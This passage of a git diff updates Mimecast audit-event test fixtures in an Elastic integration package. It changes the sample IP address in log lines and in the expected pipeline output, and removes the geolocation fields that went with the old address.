Adjustment","user":"johndoe@example.com","eventTime":"2021-10-12T15:38:05+0000","eventInfo":"Restore Remediation Incident Created - TR-C46A75-01419-R, type : restore, search criteria : {\"unremediateCode\":\"TR-C46A75-01419-M\",\"from\":\"gmail.com\",\"start\":\"2021-10-10T15:33:49+0000\",\"end\":\"2021-10-12T15:33:49+0000\"}, Date: 2021-10-12, Time: 15:38:05+0000, IP: 8.8.8.8, Application: Administration Console","category":"account_logs"} \ No newline at end of file +{"id":"eNqrVipOTS4tSs1MUbJSSgwpLctzzah00TbMTTawdC4NDPAzzwlL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxiaGBhoqOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWADOfK6w","auditType":"Remediation Incident Adjustment","user":"johndoe@example.com","eventTime":"2021-10-12T19:49:30+0000","eventInfo":"Remediation Incident Created - TR-C46A75-01420-M, type : manual, search criteria : {\"fileHash\":\"9e6011844705292d5abfe0aa38d8aff02f6d8f69689c2e7cb2338f9484774bb3\",\"start\":\"2021-09-12T19:48:59+0000\",\"end\":\"2021-10-12T19:48:59+0000\"}, Date: 2021-10-12, Time: 19:49:30+0000, IP: 67.43.156.15, Application: Administration Console","category":"account_logs"} +{"id":"eNoVzdEKgjAYQOF3-W8Vaps69S7KooSEJGXSzdAVMtdi04FF757dH77zASvayYi-gxQIcbI0HEtcRI5aRS7SxkN1L7ywzPb1gR3rdxOx_LbKcqYciiXdIe7pczKj02u-VuADn7p-HPTjDxKUkGCdUOxDO9lRK2Fa3YnltA2iDQ2X3Alje_2EFH1_LYQrrw","auditType":"Archive Mailbox Restore","user":"johndoe@example.com","eventTime":"2021-10-12T19:20:01+0000","eventInfo":"Archive mailbox restore created. Restored data from johdoe@example.com to johndoe@example.com by johndoe@example.com, Date: 2021-10-12, Time: 19:20:01+0000, IP: 67.43.156.15, Application: Administration Console","category":"archive_service_logs"} +{"id":"eNqrVipOTS4tSs1MUbJSigzJC_ZNzg-vcjYKcwz3icotC0nVdgtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxiYG5kqaOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAD-SK84","auditType":"Archive Mailbox Restore","user":"johndoejr@example.com","eventTime":"2021-10-12T18:19:33+0000","eventInfo":"Archive mailbox restore created. Restored data from johndoe@example.com to johndoejr@example.com by johndoejr@example.com, Date: 2021-10-12, Time: 18:19:33+0000, IP: 67.43.156.15, Application: Administration Console","category":"archive_service_logs"} +{"id":"eNqrVipOTS4tSs1MUbJScjMvyjIxr6yoLDY2qQopLq3yDnM1dwtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxiYGZorKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAE5dK-0","auditType":"Archive Mailbox Export Download","user":"johndoe@example.com","eventTime":"2021-10-12T17:55:14+0000","eventInfo":"Mailbox export downloaded. Download filename (HTML Report recovery id): eNqrVipOTS4tSs1MUbJSyo3RDw81rTCpynMpdiuICMopyihxynZztcisDMoN9zWLSCrPzAjz9PALNzFwySrLMNQ2yUs38g9zS860cHKNMExR0lFKLi0uyc9NLUrOT0kFGulsYuZobgoUL0pNzi9LLarULUksztYFWWdpaKqjBBQqzszPU7IyrAUAsSEteA by johndoe@example.com, Date: 2021-10-12, Time: 17:55:14+0000, IP: 67.43.156.15, Application: Administration Console","category":"archive_service_logs"} +{"id":"eNqrVipOTS4tSs1MUbJSitH39gl1cS509PT1MSnw90l0CinPCQgLS_PXNg12dQt3j_QMr4oyi_SO0Xf1jswtM7TINncxTNTO97OsNPQqqAwNU9JRSixNySzJyU8HmWhsaGlsYmBsYqqjlFxaXJKfm1qUnJ-SCrTK2cTM0dwUqLwstag4Mz9PycqwFgAxASul","auditType":"Review Set Action","user":"johndoe@example.com","eventTime":"2021-10-12T17:07:00+0000","eventInfo":"Viewed Review Set Details - Case: Class Action, Review Set: Contracts, Date: 2021-10-12, Time: 17:07:00+0000, IP: 67.43.156.15, Application: mimecast-case-review","category":"case_review_logs"} +{"id":"eNqrVipOTS4tSs1MUbJS8vDNLCt0DHEKS4xICvNJqzQ1MjOyyAlL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxsaWJurKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAByMK38","auditType":"Remediation Incident Adjustment","user":"johndoe@example.com","eventTime":"2021-10-12T15:38:05+0000","eventInfo":"Restore Remediation Incident Created - TR-C46A75-01419-R, type : restore, search criteria : {\"unremediateCode\":\"TR-C46A75-01419-M\",\"from\":\"gmail.com\",\"start\":\"2021-10-10T15:33:49+0000\",\"end\":\"2021-10-12T15:33:49+0000\"}, Date: 2021-10-12, Time: 15:38:05+0000, IP: 67.43.156.15, Application: Administration Console","category":"account_logs"} \ No newline at end of file diff --git a/packages/mimecast/data_stream/audit_events/_dev/test/pipeline/test-audit-events.log-expected.json b/packages/mimecast/data_stream/audit_events/_dev/test/pipeline/test-audit-events.log-expected.json index 544423efd4b..f11c9833871 100644 --- a/packages/mimecast/data_stream/audit_events/_dev/test/pipeline/test-audit-events.log-expected.json +++ b/packages/mimecast/data_stream/audit_events/_dev/test/pipeline/test-audit-events.log-expected.json @@ -15,31 +15,16 @@ "johndoe@example.com" ], "ip": [ - "8.8.8.8" + "67.43.156.15" ] }, "client": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, - "ip": "8.8.8.8" + "ip": "67.43.156.15" }, "event": { "action": "threat-intel-feed-download", - "ingested": "2021-11-25T11:34:08.372326900Z", - "original": "{\"auditType\":\"Threat Intel Feed Download\",\"category\":\"reporting_logs\",\"eventInfo\":\"Threat intel multiple feeds download - malware_customer_csv_20211018094502564.zip, Date: 2021-10-18, Time: 08:45:02+0000, IP: 8.8.8.8, Application: Integrations\",\"eventTime\":\"2021-10-18T08:45:02+0000\",\"id\":\"eNqrVipOTS4tSs1MUbJS8im3dA5NjAxJTPP0svD1jioo9IsINgxL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxpbmRhoKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWACCXK48\",\"user\":\"johndoe@example.com\"}", + "ingested": "2021-12-09T15:16:03.637458Z", + "original": "{\"auditType\":\"Threat Intel Feed Download\",\"category\":\"reporting_logs\",\"eventInfo\":\"Threat intel multiple feeds download - malware_customer_csv_20211018094502564.zip, Date: 2021-10-18, Time: 08:45:02+0000, IP: 67.43.156.15, Application: Integrations\",\"eventTime\":\"2021-10-18T08:45:02+0000\",\"id\":\"eNqrVipOTS4tSs1MUbJS8im3dA5NjAxJTPP0svD1jioo9IsINgxL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxpbmRhoKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWACCXK48\",\"user\":\"johndoe@example.com\"}", "id": "eNqrVipOTS4tSs1MUbJS8im3dA5NjAxJTPP0svD1jioo9IsINgxL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxpbmRhoKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWACCXK48", "created": "2021-10-18T08:45:02.000Z" }, @@ -54,7 +39,7 @@ "mimecast": { "application": "Integrations", "category": "reporting_logs", - "eventInfo": "Threat intel multiple feeds download - malware_customer_csv_20211018094502564.zip, Date: 2021-10-18, Time: 08:45:02+0000, IP: 8.8.8.8, Application: Integrations" + "eventInfo": "Threat intel multiple feeds download - malware_customer_csv_20211018094502564.zip, Date: 2021-10-18, Time: 08:45:02+0000, IP: 67.43.156.15, Application: Integrations" } }, { @@ -72,31 +57,16 @@ "johndoe@example" ], "ip": [ - "8.8.8.8" + "67.43.156.15" ] }, "client": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, - "ip": "8.8.8.8" + "ip": "67.43.156.15" }, "event": { "action": "threat-intel-feed-download", - "ingested": "2021-11-25T11:34:08.372329600Z", - "original": "{\"id\": \"eNqrVipOTS4tSs1MUbJS8nbx8CoyTPFN9akM9K5KqnQyi8z2DgtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxoaG5grKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWADbWK70\",\"auditType\": \"Threat Intel Feed Download\",\"user\": \"johndoe@example\",\"eventTime\": \"2021-10-10T22:51:57+0000\",\"eventInfo\": \"Threat intel multiple feeds download - malware_grid_csv_20211010235157027.zip, Date: 2021-10-10, Time: 22:51:57+0000, IP: 8.8.8.8, Application: Azure Sentinel\",\"category\": \"reporting_logs\"}", + "ingested": "2021-12-09T15:16:03.637467Z", + "original": "{\"id\": \"eNqrVipOTS4tSs1MUbJS8nbx8CoyTPFN9akM9K5KqnQyi8z2DgtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxoaG5grKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWADbWK70\",\"auditType\": \"Threat Intel Feed Download\",\"user\": \"johndoe@example\",\"eventTime\": \"2021-10-10T22:51:57+0000\",\"eventInfo\": \"Threat intel multiple feeds download - malware_grid_csv_20211010235157027.zip, Date: 2021-10-10, Time: 22:51:57+0000, IP: 67.43.156.15, Application: Azure Sentinel\",\"category\": \"reporting_logs\"}", "id": "eNqrVipOTS4tSs1MUbJS8nbx8CoyTPFN9akM9K5KqnQyi8z2DgtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxoaG5grKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWADbWK70", "created": "2021-10-10T22:51:57.000Z" }, @@ -111,7 +81,7 @@ "mimecast": { "application": "Azure Sentinel", "category": "reporting_logs", - "eventInfo": "Threat intel multiple feeds download - malware_grid_csv_20211010235157027.zip, Date: 2021-10-10, Time: 22:51:57+0000, IP: 8.8.8.8, Application: Azure Sentinel" + "eventInfo": "Threat intel multiple feeds download - malware_grid_csv_20211010235157027.zip, Date: 2021-10-10, Time: 22:51:57+0000, IP: 67.43.156.15, Application: Azure Sentinel" } }, { @@ -125,31 +95,16 @@ "johndoe@example.com" ], "ip": [ - "8.8.8.8" + "67.43.156.15" ] }, "client": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, - "ip": "8.8.8.8" + "ip": "67.43.156.15" }, "event": { "action": "user-logged-on", - "ingested": "2021-11-25T11:34:08.372330600Z", - "original": "{\"id\": \"eNqrVipOTS4tSs1MUbJSivD0cisuyAirMgpxDy12dPNMMcn1zQlL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkamhiqKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWADo9K8A\",\"auditType\": \"User Logged On\",\"user\": \"johndoe@example.com\",\"eventTime\": \"2021-10-11T17:17:30+0000\",\"eventInfo\": \"Successful authentication for johndoe@example.com \u003cJohn Doe\u003e, Date: 2021-10-11, Time: 18:17:30 BST, IP: 8.8.8.8, Application: Administration Console, Method: Two Step Auth, 2FA: TOTP\",\"category\": \"authentication_logs\"}", + "ingested": "2021-12-09T15:16:03.637473400Z", + "original": "{\"id\": \"eNqrVipOTS4tSs1MUbJSivD0cisuyAirMgpxDy12dPNMMcn1zQlL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkamhiqKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWADo9K8A\",\"auditType\": \"User Logged On\",\"user\": \"johndoe@example.com\",\"eventTime\": \"2021-10-11T17:17:30+0000\",\"eventInfo\": \"Successful authentication for johndoe@example.com \u003cJohn Doe\u003e, Date: 2021-10-11, Time: 18:17:30 BST, IP: 67.43.156.15, Application: Administration Console, Method: Two Step Auth, 2FA: TOTP\",\"category\": \"authentication_logs\"}", "id": "eNqrVipOTS4tSs1MUbJSivD0cisuyAirMgpxDy12dPNMMcn1zQlL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkamhiqKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWADo9K8A", "created": "2021-10-11T07:17:30.000Z" }, @@ -164,7 +119,7 @@ "mimecast": { "application": "Administration Console, Method: Two Step Auth, 2FA: TOTP", "category": "authentication_logs", - "eventInfo": "Successful authentication for johndoe@example.com \u003cJohn Doe\u003e, Date: 2021-10-11, Time: 18:17:30 BST, IP: 8.8.8.8, Application: Administration Console, Method: Two Step Auth, 2FA: TOTP" + "eventInfo": "Successful authentication for johndoe@example.com \u003cJohn Doe\u003e, Date: 2021-10-11, Time: 18:17:30 BST, IP: 67.43.156.15, Application: Administration Console, Method: Two Step Auth, 2FA: TOTP" } }, { @@ -178,31 +133,16 @@ "johndoe@example.com" ], "ip": [ - "8.8.8.8" + "67.43.156.15" ] }, "client": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, - "ip": "8.8.8.8" + "ip": "67.43.156.15" }, "event": { "action": "logon-requires-challenge", - "ingested": "2021-11-25T11:34:08.372331600Z", - "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJSSsos9DMJTPLyMA6NcCt2TA1OCwjLcwtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkamhsqaOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAC8tK60\",\"auditType\":\"Logon Requires Challenge\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-11T17:17:26+0000\",\"eventInfo\":\"Intermediate authentication for johndoe@example.com \u003cJohn Doe\u003e, Date: 2021-10-11, Time: 18:17:26 BST, IP: 8.8.8.8, Application: Administration Console, Method: Office 365, 2FA: TOTP\",\"category\":\"authentication_logs\"}", + "ingested": "2021-12-09T15:16:03.637479400Z", + "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJSSsos9DMJTPLyMA6NcCt2TA1OCwjLcwtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkamhsqaOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAC8tK60\",\"auditType\":\"Logon Requires Challenge\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-11T17:17:26+0000\",\"eventInfo\":\"Intermediate authentication for johndoe@example.com \u003cJohn Doe\u003e, Date: 2021-10-11, Time: 18:17:26 BST, IP: 67.43.156.15, Application: Administration Console, Method: Office 365, 2FA: TOTP\",\"category\":\"authentication_logs\"}", "id": "eNqrVipOTS4tSs1MUbJSSsos9DMJTPLyMA6NcCt2TA1OCwjLcwtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkamhsqaOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAC8tK60", "created": "2021-10-11T07:17:26.000Z" }, @@ -217,7 +157,7 @@ "mimecast": { "application": "Administration Console, Method: Office 365, 2FA: TOTP", "category": "authentication_logs", - "eventInfo": "Intermediate authentication for johndoe@example.com \u003cJohn Doe\u003e, Date: 2021-10-11, Time: 18:17:26 BST, IP: 8.8.8.8, Application: Administration Console, Method: Office 365, 2FA: TOTP" + "eventInfo": "Intermediate authentication for johndoe@example.com \u003cJohn Doe\u003e, Date: 2021-10-11, Time: 18:17:26 BST, IP: 67.43.156.15, Application: Administration Console, Method: Office 365, 2FA: TOTP" } }, { @@ -231,31 +171,16 @@ "johndoe@example.com" ], "ip": [ - "8.8.8.8" + "67.43.156.15" ] }, "client": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, - "ip": "8.8.8.8" + "ip": "67.43.156.15" }, "event": { "action": "user-logged-on", - "ingested": "2021-11-25T11:34:08.372332600Z", - "original": "{ \"id\": \"eNqrVipOTS4tSs1MUbJS8o0ILw8pL_cyqQosLi-MzKjKcvMzCwtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkYmZorKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAIqvLHI\", \"auditType\": \"User Logged On\", \"user\": \"johndoe@example.com\", \"eventTime\": \"2021-10-11T16:03:38+0000\", \"eventInfo\": \"Successful authentication for johndoe@example.com \u003cJohn Doe\u003e, Date: 2021-10-11, Time: 17:03:38 BST, IP: 8.8.8.8, Application: Administration Console, Method: Cloud\", \"category\": \"authentication_logs\"}", + "ingested": "2021-12-09T15:16:03.637485300Z", + "original": "{ \"id\": \"eNqrVipOTS4tSs1MUbJS8o0ILw8pL_cyqQosLi-MzKjKcvMzCwtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkYmZorKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAIqvLHI\", \"auditType\": \"User Logged On\", \"user\": \"johndoe@example.com\", \"eventTime\": \"2021-10-11T16:03:38+0000\", \"eventInfo\": \"Successful authentication for johndoe@example.com \u003cJohn Doe\u003e, Date: 2021-10-11, Time: 17:03:38 BST, IP: 67.43.156.15, Application: Administration Console, Method: Cloud\", \"category\": \"authentication_logs\"}", "id": "eNqrVipOTS4tSs1MUbJS8o0ILw8pL_cyqQosLi-MzKjKcvMzCwtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkYmZorKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAIqvLHI", "created": "2021-10-11T06:03:38.000Z" }, @@ -270,7 +195,7 @@ "mimecast": { "application": "Administration Console, Method: Cloud", "category": "authentication_logs", - "eventInfo": "Successful authentication for johndoe@example.com \u003cJohn Doe\u003e, Date: 2021-10-11, Time: 17:03:38 BST, IP: 8.8.8.8, Application: Administration Console, Method: Cloud" + "eventInfo": "Successful authentication for johndoe@example.com \u003cJohn Doe\u003e, Date: 2021-10-11, Time: 17:03:38 BST, IP: 67.43.156.15, Application: Administration Console, Method: Cloud" } }, { @@ -284,31 +209,16 @@ "johdoe@example.local" ], "ip": [ - "8.8.8.8" + "67.43.156.15" ] }, "client": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, - "ip": "8.8.8.8" + "ip": "67.43.156.15" }, "event": { "action": "mimecast-support-login", - "ingested": "2021-11-25T11:34:08.372333600Z", - "original": "{ \"id\": \"eNqrVipOTS4tSs1MUbJSCkg09A93r0rNi9FPynHJ9gwJzyrzT8sJS_PXNg12dQt3j_QMr4oyi_SO0Xf1jswtM7TINncxTNTO97OsNPQqqAwNU9JRSixNySzJyU8HmWhsaGlsZGJsaqyjlFxaXJKfm1qUnJ-SCrTK2cTM0dwUqLwstag4Mz9PycqwFgCMPCxu\", \"auditType\": \"Mimecast Support Login\", \"user\": \"johdoe@example.local\", \"eventTime\": \"2021-10-11T15:39:17+0000\", \"eventInfo\": \"Action Performed - johdoe@example.local logged into this account. by johdoe@example.local\u003cjohdoe@example.local\u003e Date: 2021-10-11 Time: 16:39:17 +0100 IP: 8.8.8.8 Application: Administration Console\", \"category\": \"mimecast_access_logs\"}", + "ingested": "2021-12-09T15:16:03.637491300Z", + "original": "{ \"id\": \"eNqrVipOTS4tSs1MUbJSCkg09A93r0rNi9FPynHJ9gwJzyrzT8sJS_PXNg12dQt3j_QMr4oyi_SO0Xf1jswtM7TINncxTNTO97OsNPQqqAwNU9JRSixNySzJyU8HmWhsaGlsZGJsaqyjlFxaXJKfm1qUnJ-SCrTK2cTM0dwUqLwstag4Mz9PycqwFgCMPCxu\", \"auditType\": \"Mimecast Support Login\", \"user\": \"johdoe@example.local\", \"eventTime\": \"2021-10-11T15:39:17+0000\", \"eventInfo\": \"Action Performed - johdoe@example.local logged into this account. by johdoe@example.local\u003cjohdoe@example.local\u003e Date: 2021-10-11 Time: 16:39:17 +0100 IP: 67.43.156.15 Application: Administration Console\", \"category\": \"mimecast_access_logs\"}", "id": "eNqrVipOTS4tSs1MUbJSCkg09A93r0rNi9FPynHJ9gwJzyrzT8sJS_PXNg12dQt3j_QMr4oyi_SO0Xf1jswtM7TINncxTNTO97OsNPQqqAwNU9JRSixNySzJyU8HmWhsaGlsZGJsaqyjlFxaXJKfm1qUnJ-SCrTK2cTM0dwUqLwstag4Mz9PycqwFgCMPCxu", "created": "2021-10-11T16:39:17.000Z" }, @@ -323,7 +233,7 @@ "mimecast": { "application": "Administration Console", "category": "mimecast_access_logs", - "eventInfo": "Action Performed - johdoe@example.local logged into this account. by johdoe@example.local\u003cjohdoe@example.local\u003e Date: 2021-10-11 Time: 16:39:17 +0100 IP: 8.8.8.8 Application: Administration Console" + "eventInfo": "Action Performed - johdoe@example.local logged into this account. by johdoe@example.local\u003cjohdoe@example.local\u003e Date: 2021-10-11 Time: 16:39:17 +0100 IP: 67.43.156.15 Application: Administration Console" } }, { @@ -337,31 +247,16 @@ "johdoe@example.local" ], "ip": [ - "8.8.8.8" + "67.43.156.15" ] }, "client": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, - "ip": "8.8.8.8" + "ip": "67.43.156.15" }, "event": { "action": "mimecast-support-login", - "ingested": "2021-11-25T11:34:08.372334500Z", - "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJSynStcDUudE51LQtJKc-M0TfwMjas8nQLS_PXNg12dQt3j_QMr4oyi_SO0Xf1jswtM7TINncxTNTO97OsNPQqqAwNU9JRSixNySzJyU8HmWhsaGliZGhgYqSjlFxaXJKfm1qUnJ-SCrTK2cTM0dwUqLwstag4Mz9PycqwFgBLJCvK\",\"auditType\":\"Mimecast Support Login\",\"user\":\"johndoe@example.local\",\"eventTime\":\"2021-10-19T11:46:40+0000\",\"eventInfo\":\"Action Performed - johdoe@example.local logged into this account. by johdoe@example.local\u003cjohdoe@example.local\u003e Date: 2021-10-19 Time: 12:46:40 +0100 IP: 8.8.8.8 Application: Administration Console\",\"category\":\"mimecast_access_logs\"}", + "ingested": "2021-12-09T15:16:03.637497300Z", + "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJSynStcDUudE51LQtJKc-M0TfwMjas8nQLS_PXNg12dQt3j_QMr4oyi_SO0Xf1jswtM7TINncxTNTO97OsNPQqqAwNU9JRSixNySzJyU8HmWhsaGliZGhgYqSjlFxaXJKfm1qUnJ-SCrTK2cTM0dwUqLwstag4Mz9PycqwFgBLJCvK\",\"auditType\":\"Mimecast Support Login\",\"user\":\"johndoe@example.local\",\"eventTime\":\"2021-10-19T11:46:40+0000\",\"eventInfo\":\"Action Performed - johdoe@example.local logged into this account. by johdoe@example.local\u003cjohdoe@example.local\u003e Date: 2021-10-19 Time: 12:46:40 +0100 IP: 67.43.156.15 Application: Administration Console\",\"category\":\"mimecast_access_logs\"}", "id": "eNqrVipOTS4tSs1MUbJSynStcDUudE51LQtJKc-M0TfwMjas8nQLS_PXNg12dQt3j_QMr4oyi_SO0Xf1jswtM7TINncxTNTO97OsNPQqqAwNU9JRSixNySzJyU8HmWhsaGliZGhgYqSjlFxaXJKfm1qUnJ-SCrTK2cTM0dwUqLwstag4Mz9PycqwFgBLJCvK", "created": "2021-10-19T12:46:40.000Z" }, @@ -376,7 +271,7 @@ "mimecast": { "application": "Administration Console", "category": "mimecast_access_logs", - "eventInfo": "Action Performed - johdoe@example.local logged into this account. by johdoe@example.local\u003cjohdoe@example.local\u003e Date: 2021-10-19 Time: 12:46:40 +0100 IP: 8.8.8.8 Application: Administration Console" + "eventInfo": "Action Performed - johdoe@example.local logged into this account. by johdoe@example.local\u003cjohdoe@example.local\u003e Date: 2021-10-19 Time: 12:46:40 +0100 IP: 67.43.156.15 Application: Administration Console" } }, { @@ -390,31 +285,16 @@ "johndoe@example.com" ], "ip": [ - "8.8.8.8" + "67.43.156.15" ] }, "client": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, - "ip": "8.8.8.8" + "ip": "67.43.156.15" }, "event": { "action": "message-action", - "ingested": "2021-11-25T11:34:08.372335500Z", - "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJS0nYKziswMy_18smyMDAs9w8P8PPNNAxL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkYmxopqOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAOifKw8\",\"auditType\":\"Message Action\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-11T15:36:01+0000\",\"eventInfo\":\"Viewed Message - Source: Search, From: \u003cJohn Done\u003e johndoe@example.com, To: \u003cjohndoe@example.com\u003e johndoe@example.com, Subject: Test on Tues 28th Sept, Processed: 2021-09-28 07:59:23+0000, Viewed Content: True, Date: 2021-10-11, Time: 15:36:01+0000, IP: 8.8.8.8, Application: mimecast-case-review\",\"category\":\"case_review_logs\"}", + "ingested": "2021-12-09T15:16:03.637503100Z", + "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJS0nYKziswMy_18smyMDAs9w8P8PPNNAxL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkYmxopqOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAOifKw8\",\"auditType\":\"Message Action\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-11T15:36:01+0000\",\"eventInfo\":\"Viewed Message - Source: Search, From: \u003cJohn Done\u003e johndoe@example.com, To: \u003cjohndoe@example.com\u003e johndoe@example.com, Subject: Test on Tues 28th Sept, Processed: 2021-09-28 07:59:23+0000, Viewed Content: True, Date: 2021-10-11, Time: 15:36:01+0000, IP: 67.43.156.15, Application: mimecast-case-review\",\"category\":\"case_review_logs\"}", "id": "eNqrVipOTS4tSs1MUbJS0nYKziswMy_18smyMDAs9w8P8PPNNAxL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkYmxopqOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAOifKw8", "created": "2021-10-11T15:36:01.000Z" }, @@ -438,7 +318,7 @@ ], "mimecast": { "name": {}, - "eventInfo": "Viewed Message - Source: Search, From: \u003cJohn Done\u003e johndoe@example.com, To: \u003cjohndoe@example.com\u003e johndoe@example.com, Subject: Test on Tues 28th Sept, Processed: 2021-09-28 07:59:23+0000, Viewed Content: True, Date: 2021-10-11, Time: 15:36:01+0000, IP: 8.8.8.8, Application: mimecast-case-review", + "eventInfo": "Viewed Message - Source: Search, From: \u003cJohn Done\u003e johndoe@example.com, To: \u003cjohndoe@example.com\u003e johndoe@example.com, Subject: Test on Tues 28th Sept, Processed: 2021-09-28 07:59:23+0000, Viewed Content: True, Date: 2021-10-11, Time: 15:36:01+0000, IP: 67.43.156.15, Application: mimecast-case-review", "application": "mimecast-case-review", "category": "case_review_logs" } @@ -454,31 +334,16 @@ "johndoe@example.com" ], "ip": [ - "8.8.8.8" + "67.43.156.15" ] }, "client": { - "geo": { - 